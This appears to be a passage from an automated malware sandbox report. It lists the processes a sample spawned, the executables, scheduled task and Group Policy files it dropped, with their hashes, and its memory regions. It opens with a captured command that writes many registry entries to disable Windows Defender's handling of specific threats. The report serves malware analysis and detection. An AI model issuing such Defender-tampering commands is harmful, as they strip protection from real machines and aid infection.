/reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3408 -ip 3408
1⤵
PID:336

C:\Users\Admin\AppData\Local\Temp\7zS242D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS242D.tmp\Install.exe it /RildidBOfb 385118 /S
1⤵
PID:6060

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
20KB

MD5
1d6d39ab03c99a032e20954f084e8237

SHA1
d51f4ab7775279b05caa0b196c147d142b12ec5b

SHA256
3e4c44711b0f69c9e3d12dc4c54148af74eed8ae791bb8582d7e653d786adf01

SHA512
55eeaa0e6c10bff74b8de6f860af46951a04ad58bcfeedc53daec1d6548ad262b19b8e8acacadd3edebc7ab81d5b1d4b957ba5fd5ccf1ddbef79124191df3e30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
20KB

MD5
ec76a07990579ac9d9b810a7c0634df4

SHA1
ba3e1afe68ebca0535c0975e5aad0f49952c604a

SHA256
e833ac909a990a67f833ca52d41087ff0672a4b0b5b8eae0f5d23d53ec3ef5d3

SHA512
ce29eda517abc51249485635e2901ac84636d462bd16431bacede2888ffc3c28cd2bf73864d3e9988eaf9f7f60978f54288176e09b53db16d1db7fb335e568a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
20KB

MD5
2bd6a40f7b9d3778bc9aedb54a9c8e84

SHA1
6deb6de19c8011c6552b1acdc041e50a9c057ff0

SHA256
d193849823f22131e616b4d2bc669f8f19e69822d6106c10418335443d7c4d5f

SHA512
533168e667083930e874a4e77d1befe83be6cb26ac19914c4831588b08869c2b810f847d187e6f03ca3ed7f603ad8e82f48a49e6143d78302732cc8a3617b40e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
769f1409a2ed8c403bb0bdb0388c3336

SHA1
d7c6461aa2c2089b5222cd4e874932fabaf9489b

SHA256
c68427f9307e2c2d8dc5602a46e7f3affce5be12647395e3b00f157bca1c7775

SHA512
29987a2795732e8015a93bc7fcdad3d9042f3602ba160f6cfd1fd73db8f8454572ebccd3f255de27de72187b9614fe518de12b8d4ab460f71d188fd85ce4d3ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
3395214f760bce1083f2d4ffc3da6274

SHA1
8b10bb1e4e2b9b810601160b0c53ecee4dd13b73

SHA256
9e259c78a7ce5824c8134f52be4cbde003fc451f72eaf38855f48cd3e7b39696

SHA512
831e1d6b53bab9dbbe789383513e114d26a812289e2b6fb46ea2bd9158ba5c1a6a559c139fce0fb9e7310dd99840654d8498005dffb27b298a83d41eaca216e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]
Filesize
654B

MD5
5cdfc4b9de66db60219b702987b6884f

SHA1
3f664159cd6af48abc3f4c4a2d0ec16ff715b208

SHA256
9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d

SHA512
3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
Filesize
830B

MD5
a483da8b27289fc9cc49d6b17e61cbf6

SHA1
2d4a5a704c2ff332df6436b7bcd16365f03c2a97

SHA256
f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

SHA512
e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
Filesize
749KB

MD5
ec071dde7d9bec968e6765d245824a66

SHA1
06f82c9e241ba768a43009925a5b081f8f955932

SHA256
21aaa33d1cd4d9f0de4f60a35c4694ba926e7e01118a8c14b2fd8856a71774c9

SHA512
cd87e5a07480c84ef9cf3dfd5feeb81506d1ecce49b17c6587cb3163ab2d9d3cc8ac1ebfbbb5b08cef7a74f07ead2bb6fa1bccb290fe1b31ce7dd8d1751325e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
Filesize
1.8MB

MD5
a99882f9b749bc3828ae0bbba5f8ab42

SHA1
245713f0928010e1534fd2ddef7788b77ebeabde

SHA256
ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd

SHA512
9c641af50a8132673e0af32f1eee948bba1a4d6156e76d1141f7fcefc8078b8abe8360c50878ba95899669ee952b988d0169eb9bc3a0a246d9a91af60cb151a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS242D.tmp\Install.exe
Filesize
192KB

MD5
8d1ba0639b3446c2638d4f3378312da1

SHA1
5d02c6ebaa1f334693c067e964df31f080a32439

SHA256
d04b710fd6e10b4c1a7b6b077241f937e4d93ed54527e4afaa3fdec852059b6c

SHA512
458d12ae9aabf745a9ca9748d1271a2bf5a859888e5de803d1aadb1c615be8ead74400a34198cd0bb68188b2c1e2de1f06ede3d7f17c96982fc6e1df7fb5b0b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSE05.tmp\Install.exe
Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jeribmqg.t3l.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\file-2456.putik
Filesize
20KB

MD5
b897e34dc596b0503848dc48aba076b5

SHA1
32a89eb9c0d59a975e508a771299115e0595a125

SHA256
a9368959bf394dd7d4d5c0cc59cea42bcbc7db76b28196ab9022285472ad94e8

SHA512
2dd32d126dcdc37065c902c2273d1814bb5ca555244be8ca042636407cc3a3b23b1fb429f85ad5aaeaed657e529ba4fa9d32ecdcb782b36a935f0232a88cf724

Download Submit
C:\Users\Admin\AppData\Local\Temp\{1FB524B0-8113-4152-9C9A-1BD07E52F671}.tmp\360P2SP.dll
Filesize
824KB

MD5
fc1796add9491ee757e74e65cedd6ae7

SHA1
603e87ab8cb45f62ecc7a9ef52d5dedd261ea812

SHA256
bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60

SHA512
8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

Download Submit
C:\Users\Admin\AppData\Local\UB6WN0Pu8gRDSpAOnx1dmRI5.exe
Filesize
4.1MB

MD5
d9fb718d09b01c967ecd525ae21e8b4c

SHA1
79a1f70b3c2734a87373cf14200b8fcde5aa9239

SHA256
1874be6ea316d2caf6b4e8e5e1d2ec3a4fee8e10d1415865709d69f52075ac28

SHA512
95f5d2c1b0147f2d23d37b5f674beb1e4380c0751f3199134d8420fe480b32d5ec11440fdd04f61b1708d7777cf8d0357a60644dd783b335f9555e294ff2b255

Download Submit
C:\Users\Admin\Pictures\6xOCmKhyvWRWA8kLRIwcZuke.exe
Filesize
284KB

MD5
bc5670c3484f680b15017a847279ceca

SHA1
28fea30ccac26ebcf09088ff5cc51ce1ad94da18

SHA256
2240ea5efc1c5b09dcbe1570088b406642d7728c3ec5e13cc05b691b9201bc0e

SHA512
f17348dc522f23307a3b5d105138aa9f9f244d8cd497c479b5caa7fa1c19b77f6cf258a7fa059c85da65d3697b85da2dfba2b12dd067b85cb8a8f5edda9d710f

Download Submit
C:\Users\Admin\Pictures\J2NHtBd30dhUI9NDb9zx4aqF.exe
Filesize
4.1MB

MD5
39f6e359a63db1da85f65384a50253b8

SHA1
c2d0d51282fceda9fe38ba0288742dcf8abcca1a

SHA256
bdbd491fc340811866d75c0ba0ba4c3c24a1859c65850704286cb8910fe5e1c0

SHA512
6e37fe19384c5554328fc20d0eeeefa528bbb5a19323c12dace2072d02a771a0d4abcc0ce944723b14e3c4255d52067688ad300739d4466b028b714d582232d5

Download Submit
C:\Users\Admin\Pictures\NKbcvg1fN17bzpud2DU6qT9n.exe
Filesize
4.2MB

MD5
362697c95a1c9964af1ab23ddfc29b04

SHA1
64f71233a4e12a1eab40fc9501c4f8c4c9eacba4

SHA256
7298b43de9d8dc586ce35f452e67b98d234c2b005648ffb7e6a21bea06a8dcb9

SHA512
e100db0020c09ae6e4e8d08c2aca00a4ad4c9efffd01902c9fa502a17d43a86e842177d8191a06b6a996c1523c9d127fc34352721f726f46308af764a0404120

Download Submit
C:\Users\Admin\Pictures\SCreYqxkmitIwYNKOcYUxaQC.exe
Filesize
6.2MB

MD5
5cc472dcd66120aed74de36341bfd75a

SHA1
1dfc4d42da90fe070d4474ddd7fa7b6f6ffa97ab

SHA256
958dd14c90b1c73852f926608f212377aa3a36666c04024f97c20deb375e9773

SHA512
b5cf358d95ec9a6cca81d2e9c23f0ede93ab94963bb5c626f4e6233a06cedae63b73dd81d2455acb29b003c3b4e2f54da6010daebc4639a3dcc54314d4fe4f81

Download Submit
C:\Users\Admin\Pictures\ZZRvujv8PzIBUqrweqU2X2lK.exe
Filesize
1.4MB

MD5
a820588766207bdd82ac79ff4f553b6f

SHA1
2e3985344dddfc9c88d5f5a22bdfa932259332d3

SHA256
0209678b3cb7b5d67d9a73fbdce851148909ecdba3b8766d5a59eca4cb848e05

SHA512
cc052c5021ec0f18e3b24701bdf9425ffdee67645eadab5f27f8dd073eb4711a824e77c83b39cb2d2a0de44733bd09504aba466120393bb63001c8d80aa76656

Download Submit
C:\Users\Admin\Pictures\hqJCDIHIFh2c2t4AbeTA46lW.exe
Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\Pictures\saUG9sELeWa2FjoiEaq6ILt8.exe
Filesize
2.6MB

MD5
3d233051324a244029b80824692b2ad4

SHA1
a053ebdacbd5db447c35df6c4c1686920593ef96

SHA256
fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84

SHA512
7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini
Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job
Filesize
426B

MD5
a62dcbffcbaf38d31ffe16fae86c7e54

SHA1
ac8a5a84b958f623c390f36baef906b90b510207

SHA256
82ef4c2115efd371eb42e5eb607f63fbe0c44dc2d84e95497242e0b836162739

SHA512
b93afc375e0e6aeeabc1d1b8ba5c21a93d607c681ae386710671ba66fa2ef829fc6cf47c6090ee5e19b4c61601c346dc4a0267fb9dc5e967ac0fb085f688403f

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize
1KB

MD5
cdfd60e717a44c2349b553e011958b85

SHA1
431136102a6fb52a00e416964d4c27089155f73b

SHA256
0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f

SHA512
dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

Download Submit
memory/868-3-0x0000000000690000-0x0000000000B41000-memory.dmp

Filesize
4.7MB

Download
memory/868-2-0x0000000000691000-0x00000000006BF000-memory.dmp

Filesize
184KB

Download
memory/868-1-0x0000000077B96000-0x0000000077B98000-memory.dmp

Filesize
8KB

Download
memory/868-18-0x0000000000690000-0x0000000000B41000-memory.dmp

Filesize
4.7MB

Download
memory/868-5-0x0000000000690000-0x0000000000B41000-memory.dmp

Filesize
4.7MB

Download
memory/868-0-0x0000000000690000-0x0000000000B41000-memory.dmp

Filesize
4.7MB

Download
memory/868-981-0x0000000000D50000-0x0000000001201000-memory.dmp

Filesize
4.7MB

Download
memory/868-478-0x0000000000D50000-0x0000000001201000-memory.dmp

Filesize
4.7MB

Download
memory/928-38-0x0000027D38940000-0x0000027D38962000-memory.dmp

Filesize
136KB

Download
memory/928-1057-0x0000027D38BE0000-0x0000027D38BEA000-memory.dmp

Filesize
40KB

Download
memory/928-4248-0x0000027D38EB0000-0x0000027D38F0C000-memory.dmp

Filesize
368KB

Download
memory/1240-5205-0x000000006E880000-0x000000006EBD7000-memory.dmp

Filesize
3.3MB

Download
memory/1240-5204-0x000000006ED60000-0x000000006EDAC000-memory.dmp

Filesize
304KB

Download
memory/1432-5102-0x00000000057B0000-0x0000000005DDA000-memory.dmp

Filesize
6.2MB

Download
memory/1432-5193-0x000000006E880000-0x000000006EBD7000-memory.dmp

Filesize
3.3MB

Download
memory/1432-5192-0x000000006ED60000-0x000000006EDAC000-memory.dmp

Filesize
304KB

Download
memory/1432-5101-0x0000000002FF0000-0x0000000003026000-memory.dmp

Filesize
216KB

Download
memory/1792-5269-0x00000000000A0000-0x000000000070E000-memory.dmp

Filesize
6.4MB

Download
memory/2220-5191-0x0000000007FE0000-0x000000000865A000-memory.dmp

Filesize
6.5MB

Download
memory/2220-5168-0x000000006ED60000-0x000000006EDAC000-memory.dmp

Filesize
304KB

Download
memory/2220-5104-0x0000000005E30000-0x0000000005E96000-memory.dmp

Filesize
408KB

Download
memory/2220-5105-0x0000000005EA0000-0x0000000005F06000-memory.dmp

Filesize
408KB

Download
memory/2220-5169-0x000000006E880000-0x000000006EBD7000-memory.dmp

Filesize
3.3MB

Download
memory/2220-5179-0x0000000007860000-0x000000000787E000-memory.dmp

Filesize
120KB

Download
memory/2220-5166-0x0000000007800000-0x0000000007834000-memory.dmp

Filesize
208KB

Download
memory/2220-5114-0x0000000005F10000-0x0000000006267000-memory.dmp

Filesize
3.3MB

Download
memory/2220-5188-0x0000000007880000-0x0000000007924000-memory.dmp

Filesize
656KB

Download
memory/2220-5103-0x0000000005650000-0x0000000005672000-memory.dmp

Filesize
136KB

Download
memory/2220-5215-0x0000000007A50000-0x0000000007A5E000-memory.dmp

Filesize
56KB

Download
memory/2220-5216-0x0000000007A60000-0x0000000007A75000-memory.dmp

Filesize
84KB

Download
memory/2220-5217-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

Filesize
104KB

Download
memory/2848-5334-0x0000000006270000-0x00000000062BC000-memory.dmp

Filesize
304KB

Download
memory/2884-5294-0x0000000000F60000-0x00000000015CE000-memory.dmp

Filesize
6.4MB

Download
memory/3036-5165-0x0000000000F60000-0x00000000015CE000-memory.dmp

Filesize
6.4MB

Download
memory/3092-5270-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

Filesize
304KB

Download
memory/3092-5286-0x0000000005EF0000-0x0000000005F12000-memory.dmp

Filesize
136KB

Download
memory/3744-105-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-86-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-4960-0x00000000068F0000-0x000000000696E000-memory.dmp

Filesize
504KB

Download
memory/3744-4961-0x0000000005260000-0x00000000052AC000-memory.dmp

Filesize
304KB

Download
memory/3744-5337-0x0000000006980000-0x00000000069D4000-memory.dmp

Filesize
336KB

Download
memory/3744-112-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-65-0x0000000000450000-0x00000000008D6000-memory.dmp

Filesize
4.5MB

Download
memory/3744-66-0x0000000006470000-0x00000000066B0000-memory.dmp

Filesize
2.2MB

Download
memory/3744-108-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-110-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-116-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-118-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-121-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-122-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-126-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-67-0x0000000006C60000-0x0000000007206000-memory.dmp

Filesize
5.6MB

Download
memory/3744-68-0x0000000006750000-0x00000000067E2000-memory.dmp

Filesize
584KB

Download
memory/3744-131-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-70-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-125-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-128-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-74-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-114-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-69-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-72-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-78-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-82-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-76-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-80-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-84-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-91-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-92-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-94-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-103-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-88-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-106-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-100-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-96-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/3744-98-0x0000000006470000-0x00000000066AA000-memory.dmp

Filesize
2.2MB

Download
memory/4252-5081-0x0000000140000000-0x0000000140F7A000-memory.dmp

Filesize
15.5MB

Download
memory/4576-5218-0x00000000070C0000-0x00000000070C8000-memory.dmp

Filesize
32KB

Download
memory/4576-5203-0x00000000070E0000-0x0000000007176000-memory.dmp

Filesize
600KB

Download
memory/4576-5194-0x0000000006FD0000-0x0000000006FDA000-memory.dmp

Filesize
40KB

Download
memory/4576-5214-0x0000000006FE0000-0x0000000006FF1000-memory.dmp

Filesize
68KB

Download
memory/4576-5190-0x0000000006F90000-0x0000000006FAA000-memory.dmp

Filesize
104KB

Download
memory/4576-5175-0x000000006E880000-0x000000006EBD7000-memory.dmp

Filesize
3.3MB

Download
memory/4576-5167-0x000000006ED60000-0x000000006EDAC000-memory.dmp

Filesize
304KB

Download
memory/4576-5154-0x00000000069C0000-0x0000000006A06000-memory.dmp

Filesize
280KB

Download
memory/4576-5140-0x0000000005F50000-0x0000000005F9C000-memory.dmp

Filesize
304KB

Download
memory/4576-5139-0x00000000059E0000-0x00000000059FE000-memory.dmp

Filesize
120KB

Download
memory/4768-4994-0x0000000000D50000-0x0000000001201000-memory.dmp

Filesize
4.7MB

Download
memory/4768-5080-0x0000000000D50000-0x0000000001201000-memory.dmp

Filesize
4.7MB

Download
memory/4768-21-0x0000000000D50000-0x0000000001201000-memory.dmp

Filesize
4.7MB

Download
memory/4768-20-0x0000000000D50000-0x0000000001201000-memory.dmp

Filesize
4.7MB

Download
memory/4768-19-0x0000000000D51000-0x0000000000D7F000-memory.dmp

Filesize
184KB

Download
memory/4768-16-0x0000000000D50000-0x0000000001201000-memory.dmp

Filesize
4.7MB

Download
memory/4916-4733-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads